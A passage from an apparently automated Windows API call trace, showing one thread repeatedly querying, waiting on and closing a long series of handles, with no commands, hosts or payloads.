lpdwFlags=0x2b7f900) returned 1 [0164.544] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0xffffffff) returned 0x0 [0164.544] CloseHandle (hObject=0x3e4) returned 1 [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetHandleInformation (in: hObject=0x3f8, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.544] WaitForSingleObject (hHandle=0x3f8, dwMilliseconds=0xffffffff) returned 0x0 [0164.544] CloseHandle (hObject=0x3f8) returned 1 [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetHandleInformation (in: hObject=0x410, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.544] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0xffffffff) returned 0x0 [0164.544] CloseHandle (hObject=0x410) returned 1 [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetHandleInformation (in: hObject=0x424, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.544] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0xffffffff) returned 0x0 [0164.544] CloseHandle (hObject=0x424) returned 1 [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetHandleInformation (in: hObject=0x438, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.544] WaitForSingleObject (hHandle=0x438, dwMilliseconds=0xffffffff) returned 0x0 [0164.544] CloseHandle (hObject=0x438) returned 1 [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetHandleInformation (in: hObject=0x44c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.544] WaitForSingleObject (hHandle=0x44c, dwMilliseconds=0xffffffff) returned 0x0 [0164.544] CloseHandle (hObject=0x44c) returned 1 [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.545] GetHandleInformation (in: hObject=0x460, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.545] WaitForSingleObject (hHandle=0x460, dwMilliseconds=0xffffffff) returned 0x0 [0164.545] CloseHandle (hObject=0x460) returned 1 [0164.545] GetCurrentThreadId () returned 0x2ec [0164.545] GetCurrentThreadId () returned 0x2ec [0164.545] GetCurrentThreadId () returned 0x2ec [0164.545] GetCurrentThreadId () returned 0x2ec [0164.545] GetHandleInformation (in: hObject=0x474, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.545] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0xffffffff) returned 0x0 [0164.545] CloseHandle (hObject=0x474) returned 1 [0164.545] GetCurrentThreadId () returned 0x2ec [0164.545] GetCurrentThreadId () returned 0x2ec [0164.545] GetCurrentThreadId () returned 0x2ec [0164.545] GetCurrentThreadId () returned 0x2ec [0164.545] GetHandleInformation (in: hObject=0x488, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.545] WaitForSingleObject (hHandle=0x488, dwMilliseconds=0xffffffff) returned 0x0 [0164.768] CloseHandle (hObject=0x488) returned 1 [0164.768] GetCurrentThreadId () returned 0x2ec [0164.768] GetCurrentThreadId () returned 0x2ec [0164.768] GetCurrentThreadId () returned 0x2ec [0164.768] GetCurrentThreadId () returned 0x2ec [0164.768] GetHandleInformation (in: hObject=0x49c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.768] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0xffffffff) returned 0x0 [0164.768] CloseHandle (hObject=0x49c) returned 1 [0164.768] GetCurrentThreadId () returned 0x2ec [0164.768] GetCurrentThreadId () returned 0x2ec [0164.768] GetCurrentThreadId () returned 0x2ec [0164.768] GetCurrentThreadId () returned 0x2ec [0164.768] GetHandleInformation (in: hObject=0x4b0, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.768] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0xffffffff) returned 0x0 [0164.768] CloseHandle (hObject=0x4b0) returned 1 [0164.768] GetCurrentThreadId () returned 0x2ec [0164.768] GetCurrentThreadId () returned 0x2ec [0164.768] GetCurrentThreadId () returned 0x2ec [0164.768] GetCurrentThreadId () returned 0x2ec [0164.769] GetHandleInformation (in: hObject=0x4c4, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.769] WaitForSingleObject (hHandle=0x4c4, dwMilliseconds=0xffffffff) returned 0x0 [0164.769] CloseHandle (hObject=0x4c4) returned 1 [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetHandleInformation (in: hObject=0x4d8, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.769] WaitForSingleObject (hHandle=0x4d8, dwMilliseconds=0xffffffff) returned 0x0 [0164.769] CloseHandle (hObject=0x4d8) returned 1 [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetHandleInformation (in: hObject=0x4ec, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.769] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0xffffffff) returned 0x0 [0164.769] CloseHandle (hObject=0x4ec) returned 1 [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetHandleInformation (in: hObject=0x288, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.769] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0xffffffff) returned 0x0 [0164.769] CloseHandle (hObject=0x288) returned 1 [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetHandleInformation (in: hObject=0x50c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.769] WaitForSingleObject (hHandle=0x50c, dwMilliseconds=0xffffffff) returned 0x0 [0164.769] CloseHandle (hObject=0x50c) returned 1 [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetHandleInformation (in: hObject=0x520, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.769] WaitForSingleObject (hHandle=0x520, dwMilliseconds=0xffffffff) returned 0x0 [0164.769] CloseHandle (hObject=0x520) returned 1 [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetCurrentThreadId () returned 0x2ec [0164.769] GetHandleInformation (in: hObject=0x534, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.769] WaitForSingleObject (hHandle=0x534, dwMilliseconds=0xffffffff) returned 0x0 [0164.770] CloseHandle (hObject=0x534) returned 1 [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetHandleInformation (in: hObject=0x548, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.770] WaitForSingleObject (hHandle=0x548, dwMilliseconds=0xffffffff) returned 0x0 [0164.770] CloseHandle (hObject=0x548) returned 1 [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetHandleInformation (in: hObject=0x55c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.770] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0xffffffff) returned 0x0 [0164.770] CloseHandle (hObject=0x55c) returned 1 [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetHandleInformation (in: hObject=0x570, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.770] WaitForSingleObject (hHandle=0x570, dwMilliseconds=0xffffffff) returned 0x0 [0164.770] CloseHandle (hObject=0x570) returned 1 [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetHandleInformation (in: hObject=0x584, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.770] WaitForSingleObject (hHandle=0x584, dwMilliseconds=0xffffffff) returned 0x0 [0164.770] CloseHandle (hObject=0x584) returned 1 [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetHandleInformation (in: hObject=0x59c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.770] WaitForSingleObject (hHandle=0x59c, dwMilliseconds=0xffffffff) returned 0x0 [0164.770] CloseHandle (hObject=0x59c) returned 1 [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetCurrentThreadId () returned 0x2ec [0164.770] GetHandleInformation (in: hObject=0x5b4, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.770] WaitForSingleObject (hHandle=0x5b4, dwMilliseconds=0xffffffff) returned 0x0 [0164.770] CloseHandle (hObject=0x5b4) returned 1 [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetHandleInformation (in: hObject=0x5c8, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.771] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0xffffffff) returned 0x0 [0164.771] CloseHandle (hObject=0x5c8) returned 1 [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetHandleInformation (in: hObject=0x5dc, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.771] WaitForSingleObject (hHandle=0x5dc, dwMilliseconds=0xffffffff) returned 0x0 [0164.771] CloseHandle (hObject=0x5dc) returned 1 [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetHandleInformation (in: hObject=0x5f0, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.771] WaitForSingleObject (hHandle=0x5f0, dwMilliseconds=0xffffffff) returned 0x0 [0164.771] CloseHandle (hObject=0x5f0) returned 1 [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetHandleInformation (in: hObject=0x604, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.771] WaitForSingleObject (hHandle=0x604, dwMilliseconds=0xffffffff) returned 0x0 [0164.771] CloseHandle (hObject=0x604) returned 1 [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetHandleInformation (in: hObject=0x618, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.771] WaitForSingleObject (hHandle=0x618, dwMilliseconds=0xffffffff) returned 0x0 [0164.771] CloseHandle (hObject=0x618) returned 1 [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetHandleInformation (in: hObject=0x62c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.771] WaitForSingleObject (hHandle=0x62c, dwMilliseconds=0xffffffff) returned 0x0 [0164.771] CloseHandle (hObject=0x62c) returned 1 [0164.771] GetCurrentThreadId () returned 0x2ec [0164.771] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetHandleInformation (in: hObject=0x640, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.772] WaitForSingleObject (hHandle=0x640, dwMilliseconds=0xffffffff) returned 0x0 [0164.772] CloseHandle (hObject=0x640) returned 1 [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetHandleInformation (in: hObject=0x654, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.772] WaitForSingleObject (hHandle=0x654, dwMilliseconds=0xffffffff) returned 0x0 [0164.772] CloseHandle (hObject=0x654) returned 1 [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetHandleInformation (in: hObject=0x668, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.772] WaitForSingleObject (hHandle=0x668, dwMilliseconds=0xffffffff) returned 0x0 [0164.772] CloseHandle (hObject=0x668) returned 1 [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetHandleInformation (in: hObject=0x67c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.772] WaitForSingleObject (hHandle=0x67c, dwMilliseconds=0xffffffff) returned 0x0 [0164.772] CloseHandle (hObject=0x67c) returned 1 [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetHandleInformation (in: hObject=0x690, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.772] WaitForSingleObject (hHandle=0x690, dwMilliseconds=0xffffffff) returned 0x0 [0164.772] CloseHandle (hObject=0x690) returned 1 [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetHandleInformation (in: hObject=0x6a4, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.772] WaitForSingleObject (hHandle=0x6a4, dwMilliseconds=0xffffffff) returned 0x0 [0164.772] CloseHandle (hObject=0x6a4) returned 1 [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.772] GetCurrentThreadId () returned 0x2ec [0164.773] GetHandleInformation (in: hObject=0x6b8, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.773] WaitForSingleObject (hHandle=0x6b8, dwMilliseconds=0xffffffff) returned 0x0 [0165.018] CloseHandle (hObject=0x6b8) returned 1 [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetHandleInformation (in: hObject=0x6cc, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.018] WaitForSingleObject (hHandle=0x6cc, dwMilliseconds=0xffffffff) returned 0x0 [0165.018] CloseHandle (hObject=0x6cc) returned 1 [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetHandleInformation (in: hObject=0x6e0, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.018] WaitForSingleObject (hHandle=0x6e0, dwMilliseconds=0xffffffff) returned 0x0 [0165.018] CloseHandle (hObject=0x6e0) returned 1 [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetHandleInformation (in: hObject=0x6f4, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.018] WaitForSingleObject (hHandle=0x6f4, dwMilliseconds=0xffffffff) returned 0x0 [0165.018] CloseHandle (hObject=0x6f4) returned 1 [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetCurrentThreadId () returned 0x2ec [0165.018] GetHandleInformation (in: hObject=0x5a0, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.018] WaitForSingleObject (hHandle=0x5a0, dwMilliseconds=0xffffffff) returned 0x0 [0165.019] CloseHandle (hObject=0x5a0) returned 1 [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetHandleInformation (in: hObject=0x718, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.019] WaitForSingleObject (hHandle=0x718, dwMilliseconds=0xffffffff) returned 0x0 [0165.019] CloseHandle (hObject=0x718) returned 1 [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetHandleInformation (in: hObject=0x72c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.019] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0xffffffff) returned 0x0 [0165.019] CloseHandle (hObject=0x72c) returned 1 [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetHandleInformation (in: hObject=0x740, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.019] WaitForSingleObject (hHandle=0x740, dwMilliseconds=0xffffffff) returned 0x0 [0165.019] CloseHandle (hObject=0x740) returned 1 [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetHandleInformation (in: hObject=0x754, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.019] WaitForSingleObject (hHandle=0x754, dwMilliseconds=0xffffffff) returned 0x0 [0165.019] CloseHandle (hObject=0x754) returned 1 [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetHandleInformation (in: hObject=0x768, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.019] WaitForSingleObject (hHandle=0x768, dwMilliseconds=0xffffffff) returned 0x0 [0165.019] CloseHandle (hObject=0x768) returned 1 [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetCurrentThreadId () returned 0x2ec [0165.019] GetHandleInformation (in: hObject=0x77c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.019] WaitForSingleObject (hHandle=0x77c, dwMilliseconds=0xffffffff) returned 0x0 [0165.019] CloseHandle (hObject=0x77c) returned 1 [0165.019] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetHandleInformation (in: hObject=0x794, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.020] WaitForSingleObject (hHandle=0x794, dwMilliseconds=0xffffffff) returned 0x0 [0165.020] CloseHandle (hObject=0x794) returned 1 [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetHandleInformation (in: hObject=0x7a8, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.020] WaitForSingleObject (hHandle=0x7a8, dwMilliseconds=0xffffffff) returned 0x0 [0165.020] CloseHandle (hObject=0x7a8) returned 1 [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetHandleInformation (in: hObject=0x7bc, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.020] WaitForSingleObject (hHandle=0x7bc, dwMilliseconds=0xffffffff) returned 0x0 [0165.020] CloseHandle (hObject=0x7bc) returned 1 [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetHandleInformation (in: hObject=0x7d0, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.020] WaitForSingleObject (hHandle=0x7d0, dwMilliseconds=0xffffffff) returned 0x0 [0165.020] CloseHandle (hObject=0x7d0) returned 1 [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetHandleInformation (in: hObject=0x7e4, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.020] WaitForSingleObject (hHandle=0x7e4, dwMilliseconds=0xffffffff) returned 0x0 [0165.020] CloseHandle (hObject=0x7e4) returned 1 [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetHandleInformation (in: hObject=0x7f8, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.020] WaitForSingleObject (hHandle=0x7f8, dwMilliseconds=0xffffffff) returned 0x0 [0165.020] CloseHandle (hObject=0x7f8) returned 1 [0165.020] GetCurrentThreadId () returned 0x2ec [0165.020] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetHandleInformation (in: hObject=0x810, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.021] WaitForSingleObject (hHandle=0x810, dwMilliseconds=0xffffffff) returned 0x0 [0165.021] CloseHandle (hObject=0x810) returned 1 [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetHandleInformation (in: hObject=0x824, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.021] WaitForSingleObject (hHandle=0x824, dwMilliseconds=0xffffffff) returned 0x0 [0165.021] CloseHandle (hObject=0x824) returned 1 [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetHandleInformation (in: hObject=0x838, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.021] WaitForSingleObject (hHandle=0x838, dwMilliseconds=0xffffffff) returned 0x0 [0165.021] CloseHandle (hObject=0x838) returned 1 [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetHandleInformation (in: hObject=0x84c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.021] WaitForSingleObject (hHandle=0x84c, dwMilliseconds=0xffffffff) returned 0x0 [0165.021] CloseHandle (hObject=0x84c) returned 1 [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetHandleInformation (in: hObject=0x860, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.021] WaitForSingleObject (hHandle=0x860, dwMilliseconds=0xffffffff) returned 0x0 [0165.021] CloseHandle (hObject=0x860) returned 1 [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetHandleInformation (in: hObject=0x874, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.021] WaitForSingleObject (hHandle=0x874, dwMilliseconds=0xffffffff) returned 0x0 [0165.021] CloseHandle (hObject=0x874) returned 1 [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetCurrentThreadId () returned 0x2ec [0165.021] GetHandleInformation (in: hObject=0x888, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.021] WaitForSingleObject (hHandle=0x888, dwMilliseconds=0xffffffff) returned 0x0 [0165.022] CloseHandle (hObject=0x888) returned 1 [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetHandleInformation (in: hObject=0x89c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.022] WaitForSingleObject (hHandle=0x89c, dwMilliseconds=0xffffffff) returned 0x0 [0165.022] CloseHandle (hObject=0x89c) returned 1 [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetHandleInformation (in: hObject=0x8b0, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.022] WaitForSingleObject (hHandle=0x8b0, dwMilliseconds=0xffffffff) returned 0x0 [0165.022] CloseHandle (hObject=0x8b0) returned 1 [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetHandleInformation (in: hObject=0x8c4, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) 